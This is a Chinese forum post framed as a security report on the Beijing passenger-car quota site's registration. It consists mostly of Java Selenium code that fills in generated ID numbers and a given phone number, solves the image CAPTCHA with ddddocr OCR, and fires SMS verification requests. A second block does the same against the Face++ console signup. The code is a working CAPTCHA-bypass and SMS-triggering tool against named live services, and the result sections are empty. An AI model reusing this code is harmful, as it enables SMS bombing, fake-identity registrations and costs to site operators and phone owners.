【北京市小客车调控网站-注册/登录安全分析陈诉】

打印 上一主题 下一主题

主题 1712|帖子 1712|积分 5136

前言

由于网站注册入口容易被黑客攻击,存在如下安全问题:

  • 暴力破解暗码,造成用户信息泄露
  • 短信盗刷的安全问题,影响业务及导致用户投诉
  • 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞

    所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力进步的当下,连百度如许的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底怎样? 请看具体分析
一、 北京市小客车调控PC 注册入口

简介:北京市小客车指标调控管理信息系统于2011年1月1日正式启动,市民登录专网可以24小时提出申请。记者从北京市交通委获悉,前非常钟内,就有超过6000名市民获得有效申请编码。虽然跟6000余人同一时间段报名,但网上填报过程比较顺畅,填写的内容不足20项,10分钟可以完成。

二丶 安全分析:

接纳传统的图形验证码方式,具体为4个数字英文,ocr 识别率在 95% 以上。

测试方法:
接纳模拟器+OCR识别
1. 模拟器交互

  1.         private OcrClientDddd ddddOcr = new OcrClientDddd();
  2.         private IdCardGenerator g = new IdCardGenerator();
  3.         private String INDEX_URL = "https://apply.jtw.beijing.gov.cn/apply/app/common/person/register";
  4.         @Override
  5.         public RetEntity send(WebDriver driver, String areaCode, String phone) {
  6.                 RetEntity retEntity = new RetEntity();
  7.                 try {
  8.                         driver.get(INDEX_URL);
  9.                         Thread.sleep(1 * 1000);
  10.                         WebElement selectorElement = driver.findElement(By.id("idType"));
  11.                         Select select = new Select(selectorElement);
  12.                         select.selectByValue("JMSFZ");
  13.                         WebElement idElement = driver.findElement(By.id("idCode_new"));
  14.                         idElement.sendKeys(g.generate());
  15.                         // 3 输入手机号
  16.                         WebElement phoneElement = ChromeDriverManager.waitElement(driver, By.id("mobile_new"), 1);
  17.                         phoneElement.sendKeys(phone);
  18.                         Thread.sleep(1 * 1000);
  19.                         String url, imgCode = null;
  20.                         WebElement imgElement;
  21.                         byte[] imgByte = null;
  22.                         for (int i = 0; i < 6; i++) {
  23.                                 // 4 获取图形验证码
  24.                                 imgElement = driver.findElement(By.xpath("//img[contains(@src,'/apply/app/common/validCodeImage')]"));
  25.                                 url = imgElement.getAttribute("src");
  26.                                 imgByte = GetImage.callJsByUrl(driver, url);
  27.                                 int len = (imgByte != null) ? imgByte.length : 0;
  28.                                 imgCode = (len > 500) ? ddddOcr.getImgCode(imgByte) : null;
  29.                                 if (imgCode == null || imgCode.length() < 4) {
  30.                                         ((JavascriptExecutor) driver).executeScript("arguments[0].click();", imgElement);
  31.                                         Thread.sleep(1000);
  32.                                         continue;
  33.                                 }
  34.                                 break;
  35.                         }
  36.                         retEntity.setMsg("[imgCode=" + imgCode + "]");
  37.                         if (imgCode == null || imgCode.length() < 4) {
  38.                                 return retEntity;
  39.                         }
  40.                         // 5 输入识别出来的图形验证码
  41.                         driver.findElement(By.id("validCode")).sendKeys(imgCode);
  42.                         Thread.sleep(500);
  43.                         // 6 点击获取验证码
  44.                         Thread.sleep(500);
  45.                         WebElement getCodeElement = driver.findElement(By.id("getRandomCode"));
  46.                         getCodeElement.click();
  47.                         WebElement msgElement = ChromeDriverManager.waitElement(driver, By.id("alert-success"), 20);
  48.                         // 短信验证码已发送,请在十五分钟内输入
  49.                         String msg = (msgElement != null) ? msgElement.getText() : null;
  50.                         if (msg == null) {
  51.                                 WebElement validElement = driver.findElement(By.id("getValidCode"));
  52.                                 String dataContent = validElement.getAttribute("data-content");
  53.                                 if (dataContent != null) {
  54.                                         retEntity.setMsg(dataContent + " imgCode:" + imgCode);
  55.                                 }
  56.                                 return retEntity;
  57.                         }
  58.                         retEntity.setMsg(msg);
  59.                         if (msg.contains("短信验证码已发送")) {
  60.                                 retEntity.setRet(0);
  61.                         }
  62.                         return retEntity;
  63.                 } catch (Exception e) {
  64.                         System.out.println("phone=" + phone + ",e=" + e.toString());
  65.                         for (StackTraceElement ele : e.getStackTrace()) {
  66.                                 System.out.println(ele.toString());
  67.                         }
  68.                         return null;
  69.                 } finally {
  70.                         driver.manage().deleteAllCookies();
  71.                 }
  72.         }
  73.        
复制代码
2. 获取图形验证码

  1. public static byte[] callJsById(WebDriver driver, String id) {
  2.                 return callJsById(driver, id, null);
  3.         }
  4.         public static byte[] callJsById(WebDriver driver, String id, StringBuffer base64) {
  5.                 String js = "let c = document.createElement('canvas');let ctx = c.getContext('2d');";
  6.                 js += "let img = document.getElementById('" + id + "'); /*找到图片*/ ";
  7.                 js += "c.height=img.naturalHeight;c.width=img.naturalWidth;";
  8.                 js += "ctx.drawImage(img, 0, 0,img.naturalWidth, img.naturalHeight);";
  9.                 js += "let base64String = c.toDataURL();return base64String;";
  10.                 String src = ((JavascriptExecutor) driver).executeScript(js).toString();
  11.                 String base64Str = src.substring(src.indexOf(",") + 1);
  12.                 if (base64 != null) {
  13.                         base64.append(base64Str);
  14.                 }
  15.                 byte[] vBytes = (base64Str != null) ? imgStrToByte(base64Str) : null;
  16.                 return vBytes;
  17.         }
复制代码
3.图形验证码识别(Ddddocr)

  1. private static String INDEX_URL = "https://console.faceplusplus.com.cn/register";
  2.         @Override
  3.         public RetEntity send(WebDriver driver, String areaCode, String phone) {
  4.                 RetEntity retEntity = new RetEntity();
  5.                 try {
  6.                         driver.get(INDEX_URL);
  7.                         Thread.sleep(1 * 1000);
  8.                         // 1 输入手机号
  9.                         WebElement phoneElemet = driver.findElement(By.id("phone"));
  10.                         phoneElemet.sendKeys(phone);
  11.                         // 点击发送验证码按钮
  12.                         Thread.sleep(500);
  13.                         WebElement sendElemet = driver.findElement(By.xpath("//button/span[contains(text(),'发送验证码')]"));
  14.                         sendElemet.click();
  15.                         // 2 获取图形验证码
  16.                         WebElement imgElement, errElement, inputElement;
  17.                         String imgCode = null;
  18.                         byte[] imgByte = null;
  19.                         Thread.sleep(1 * 1000);
  20.                         for (int i = 0; i < 1; i++) {
  21.                                 imgElement = driver.findElement(By.xpath("//img[contains(@src,'/api/official/captcha/get')]"));
  22.                                 String imgUrl = imgElement.getAttribute("src");
  23.                                 imgByte = GetImage.callJsByUrl(driver, imgUrl);
  24.                                 int len = (imgByte != null) ? imgByte.length : 0;
  25.                                 imgCode = (len > 0) ? ddddOcr.getImgCode(imgByte) : null;
  26.                                 if (imgCode == null) {
  27.                                         continue;
  28.                                 }
  29.                                 // 3 输入识别出来的图形验证码
  30.                                 inputElement = driver.findElement(By.id("code"));
  31.                                 inputElement.sendKeys(imgCode);
  32.                                 ddddOcr.saveFile(this.getClass().getSimpleName(), imgCode, imgByte);
  33.                                 // 4 确 认
  34.                                 Thread.sleep(1 * 1000);
  35.                                 // 点击智能按钮
  36.                                 boolean isRobot = false;
  37.                                 int beginX = 1540;
  38.                                 int beginY = 879;
  39.                                 if (isRobot)
  40.                                         RobotMove.click(beginX, beginY);
  41.                                 else {
  42.                                         WebElement confirmElement = driver.findElement(By.xpath("//div[@class='ant-modal-footer']/button/span"));
  43.                                         confirmElement.click();
  44.                                 }
  45.                         }
  46.                         Thread.sleep(10 * 1000);
  47.                         WebElement msgElement = ChromeDriverManager.waitElement(driver, By.xpath("//button/span[contains(text(),'s')]"), 20);
  48.                         String gtInfo = (msgElement != null && msgElement.isDisplayed()) ? msgElement.getText() : null;
  49.                         retEntity.setMsg(imgCode + "->" + gtInfo);
  50.                         if (gtInfo != null && gtInfo.contains("秒")) {
  51.                                 retEntity.setRet(0);
  52.                                 return retEntity;
  53.                         }
  54.                         return retEntity;
  55.                 } catch (Exception e) {
  56.                         System.out.println("phone=" + phone + ",e=" + e.toString());
  57.                         for (StackTraceElement ele : e.getStackTrace()) {
  58.                                 System.out.println(ele.toString());
  59.                         }
  60.                         return null;
  61.                 } finally {
  62.                         driver.manage().deleteAllCookies();
  63.                 }
  64.         }
复制代码
4. 图形OCR识别结果:


5. 测试返回结果:


三 丶测试陈诉 :


四丶结语

北京市小客车指标调控管理信息系统于2011年1月1日正式启动,市民登录专网可以24小时提出申请
。北京市交通委作为中国首都交通管理机构,拥有雄厚的资源, 技术实力也应该不错,但接纳的照旧老一代的图形验证码已经落伍了, 用户体验一样平常,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
   很多人在短信服务刚开始创建的阶段,可能不会在安全方面思量太多,来由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。
  有一些来由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
  所以大家在安全方面照旧要重视。(血淋淋的栗子!)#安全短信#
  戳这里→康康你手机号在过多少网站注册过!!!
谷歌图形验证码在AI 眼前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当全部的图形验证码都被破解时,大家又该怎样做好防御呢?
>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象地区面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《利用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的练习部署套件》

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表